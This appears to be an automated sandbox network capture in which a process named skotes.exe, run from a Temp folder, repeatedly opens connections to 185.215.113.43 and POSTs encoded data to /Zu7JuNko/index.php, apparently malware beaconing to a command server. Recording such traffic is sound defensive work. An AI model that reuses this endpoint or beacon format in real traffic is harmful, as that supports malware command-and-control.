                                              Nov 22, 2024 17:13:06.989706039 CET4970880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:08.501586914 CET4970880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:08.510174036 CET4970980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:08.621671915 CET8049708185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:08.621792078 CET4970880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:08.629791975 CET8049709185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:08.629884005 CET4970980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:08.630112886 CET4970980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:08.779913902 CET8049709185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:09.966839075 CET8049709185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:09.966990948 CET4970980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:11.617469072 CET4970980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:11.617872953 CET4971080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:11.737514973 CET8049709185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:11.737548113 CET8049710185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:11.737612009 CET4970980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:11.737690926 CET4971080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:11.737935066 CET4971080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:11.857409000 CET8049710185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:13.069196939 CET8049710185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:13.070892096 CET4971080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:14.573187113 CET4971080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:14.573564053 CET4971180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:14.693270922 CET8049711185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:14.693454027 CET4971180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:14.693675041 CET8049710185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:14.693737030 CET4971080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:14.704283953 CET4971180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:14.823862076 CET8049711185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:16.100543022 CET8049711185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:16.100609064 CET4971180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:17.729536057 CET4971180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:17.729924917 CET4971280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:17.849667072 CET8049712185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:17.849780083 CET8049711185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:17.849783897 CET4971280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:17.849828959 CET4971180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:17.862495899 CET4971280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:17.982089043 CET8049712185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:19.284539938 CET8049712185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:19.284672022 CET4971280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:20.834911108 CET4971280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:20.835383892 CET4971380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:20.955377102 CET8049712185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:20.955414057 CET8049713185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:20.955554008 CET4971280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:20.955998898 CET4971380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:20.955998898 CET4971380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:21.075572014 CET8049713185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:22.337306023 CET8049713185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:22.337452888 CET4971380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:23.970741987 CET4971380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:23.971095085 CET4971480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:24.091083050 CET8049713185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:24.091149092 CET8049714185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:24.091223955 CET4971380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:24.091269970 CET4971480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:24.095844984 CET4971480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:24.215580940 CET8049714185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:25.472306013 CET8049714185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:25.472363949 CET4971480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:26.979396105 CET4971480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:26.979785919 CET4971580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:27.172750950 CET8049715185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:27.172800064 CET8049714185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:27.172926903 CET4971580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:27.172930002 CET4971480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:27.173180103 CET4971580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:27.303040981 CET8049715185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:28.507762909 CET8049715185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:28.507879972 CET4971580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:30.135612965 CET4971580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:30.136076927 CET4971680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:30.255686045 CET8049715185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:30.255729914 CET8049716185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:30.255774975 CET4971580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:30.255821943 CET4971680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:30.256043911 CET4971680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:30.375493050 CET8049716185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:31.594407082 CET8049716185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:31.594518900 CET4971680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:33.106389046 CET4971680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:33.106724024 CET4971780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:33.227237940 CET8049717185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:33.227298975 CET8049716185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:33.227391958 CET4971780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:33.227725983 CET4971780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:33.227730989 CET4971680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:33.347521067 CET8049717185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:34.610512972 CET8049717185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:34.610635996 CET4971780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:36.229502916 CET4971780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:36.229895115 CET4971880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:36.349541903 CET8049717185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:36.349561930 CET8049718185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:36.349659920 CET4971780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:36.349699974 CET4971880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:36.349973917 CET4971880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:36.469381094 CET8049718185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:37.739207983 CET8049718185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:37.739356995 CET4971880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:39.272630930 CET4971880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:39.273027897 CET4972080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:39.392586946 CET8049718185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:39.392611980 CET8049720185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:39.393069029 CET4972080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:39.393069029 CET4972080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:39.393074036 CET4971880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:39.513621092 CET8049720185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:40.989097118 CET8049720185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:40.989245892 CET4972080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:42.619962931 CET4972080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:42.620408058 CET4972180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:42.740031958 CET8049721185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:42.740078926 CET8049720185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:42.740288019 CET4972080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:42.740603924 CET4972180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:42.740603924 CET4972180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:42.860115051 CET8049721185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:44.299521923 CET8049721185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:44.299665928 CET4972180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:45.810496092 CET4972180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:45.818274021 CET4972280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:45.936151028 CET8049721185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:45.936286926 CET4972180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:45.943912983 CET8049722185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:45.944032907 CET4972280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:45.944297075 CET4972280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:46.065118074 CET8049722185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:47.563025951 CET8049722185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:47.563272953 CET4972280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:49.185066938 CET4972280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:49.185437918 CET4972380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:49.305143118 CET8049723185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:49.305171967 CET8049722185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:49.305332899 CET4972380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:49.305345058 CET4972280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:49.305599928 CET4972380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:49.425024986 CET8049723185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:51.051986933 CET8049723185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:51.052102089 CET4972380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:52.557632923 CET4972380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:52.557976007 CET4972480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:52.677717924 CET8049724185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:52.677736044 CET8049723185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:52.677884102 CET4972380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:52.678206921 CET4972480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:52.678206921 CET4972480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:52.797801971 CET8049724185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:54.062625885 CET8049724185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:54.062746048 CET4972480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:55.685247898 CET4972480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:55.685684919 CET4972580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:55.805965900 CET8049725185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:55.806245089 CET4972580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:55.806408882 CET8049724185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:55.806476116 CET4972480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:55.806749105 CET4972580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:55.926254034 CET8049725185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:57.203372002 CET8049725185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:57.203500032 CET4972580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:58.713861942 CET4972580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:58.714411020 CET4972680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:58.834327936 CET8049725185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:58.834435940 CET8049726185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:58.834527016 CET4972580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:58.834858894 CET4972680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:58.834858894 CET4972680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:58.954711914 CET8049726185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:00.270227909 CET8049726185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:00.270353079 CET4972680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:01.934365034 CET4972680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:01.934668064 CET4972780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:02.054197073 CET8049726185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:02.054214001 CET8049727185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:02.054374933 CET4972780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:02.054522991 CET4972680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:02.054657936 CET4972780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:02.174535036 CET8049727185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:03.398457050 CET8049727185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:03.399538994 CET4972780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:04.931216002 CET4972780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:04.931823015 CET4972880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:05.051454067 CET8049728185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:05.051547050 CET4972880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:05.052788019 CET4972880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:05.053122997 CET8049727185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:05.053172112 CET4972780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:05.172537088 CET8049728185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:06.448580980 CET8049728185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:06.452347994 CET4972880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:08.091970921 CET4972880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:08.092360973 CET4972980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:08.212208033 CET8049729185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:08.212289095 CET8049728185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:08.212300062 CET4972980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:08.212364912 CET4972880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:08.212848902 CET4972980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:08.332880974 CET8049729185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:09.558049917 CET8049729185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:09.558136940 CET4972980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:11.084058046 CET4972980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:11.085880995 CET4973080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:11.203932047 CET8049729185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:11.204005003 CET4972980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:11.205395937 CET8049730185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:11.208342075 CET4973080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:11.208610058 CET4973080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:11.328190088 CET8049730185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:12.653995991 CET8049730185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:12.654069901 CET4973080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:14.279571056 CET4973080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:14.280029058 CET4973180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:14.400608063 CET8049731185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:14.400708914 CET4973180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:14.400732040 CET8049730185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:14.400777102 CET4973080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:14.401375055 CET4973180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:14.521034956 CET8049731185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:15.779257059 CET8049731185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:15.779325962 CET4973180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:17.295367956 CET4973180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:17.295743942 CET4973280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:17.415800095 CET8049732185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:17.415906906 CET8049731185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:17.415936947 CET4973280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:17.415970087 CET4973180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:17.417208910 CET4973280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:17.536863089 CET8049732185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:18.766311884 CET8049732185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:18.766458035 CET4973280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:20.513112068 CET4973280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:20.524350882 CET4973380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:20.634232044 CET8049732185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:20.634548903 CET4973280192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:20.644404888 CET8049733185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:20.644519091 CET4973380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:20.650302887 CET4973380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:20.770183086 CET8049733185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:22.023087025 CET8049733185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:22.023353100 CET4973380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:23.552010059 CET4973380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:23.552380085 CET4973480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:23.673284054 CET8049733185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:23.673316956 CET8049734185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:23.673350096 CET4973380192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:23.673407078 CET4973480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:23.714600086 CET4973480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:23.837318897 CET8049734185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:25.114605904 CET8049734185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:25.114677906 CET4973480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:26.756431103 CET4973480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:26.757489920 CET4973580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:26.876653910 CET8049734185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:26.876889944 CET4973480192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:26.877118111 CET8049735185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:26.877194881 CET4973580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:26.877865076 CET4973580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:26.997509956 CET8049735185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:28.272814035 CET8049735185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:28.272923946 CET4973580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:29.780831099 CET4973580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:29.781284094 CET4973680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:29.901034117 CET8049736185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:29.901109934 CET8049735185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:29.901127100 CET4973680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:29.901174068 CET4973580192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:29.901704073 CET4973680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:30.021570921 CET8049736185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:31.302551985 CET8049736185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:31.302676916 CET4973680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:32.938873053 CET4973680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:32.939258099 CET4973780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:33.058938026 CET8049737185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:33.058990955 CET8049736185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:33.059084892 CET4973680192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:33.059098005 CET4973780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:33.060070038 CET4973780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:33.179907084 CET8049737185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:34.413427114 CET8049737185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:34.413536072 CET4973780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:35.920224905 CET4973780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:35.920634031 CET4973880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:36.041845083 CET8049738185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:36.041949987 CET4973880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:36.042746067 CET4973880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:36.056951046 CET8049737185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:36.057111025 CET4973780192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:36.162825108 CET8049738185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:37.387913942 CET8049738185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:37.387974977 CET4973880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:39.013952017 CET4973880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:39.014353037 CET4973980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:39.133980989 CET8049739185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:39.134052992 CET8049738185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:39.134099007 CET4973980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:39.134125948 CET4973880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:39.134449005 CET4973980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:39.254021883 CET8049739185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:40.515144110 CET8049739185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:40.515256882 CET4973980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:42.029902935 CET4973980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:42.030230999 CET4974080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:42.150641918 CET8049740185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:42.150724888 CET4974080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:42.151016951 CET8049739185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:42.151087999 CET4973980192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:42.151180029 CET4974080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:42.270891905 CET8049740185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:43.533092022 CET8049740185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:43.533291101 CET4974080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:45.157246113 CET4974080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:45.157515049 CET4974180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:45.277266026 CET8049741185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:45.277446985 CET4974180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:45.277729988 CET4974180192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:45.277829885 CET8049740185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:45.277898073 CET4974080192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:14:45.397237062 CET8049741185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:46.657111883 CET8049741185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:14:46.657227039 CET4974180192.168.2.8185.215.113.43

                                              HTTP Request Dependency Graph

                                              • 185.215.113.43

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.849708185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:05.556982994 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:06.989620924 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.849709185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:08.630112886 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
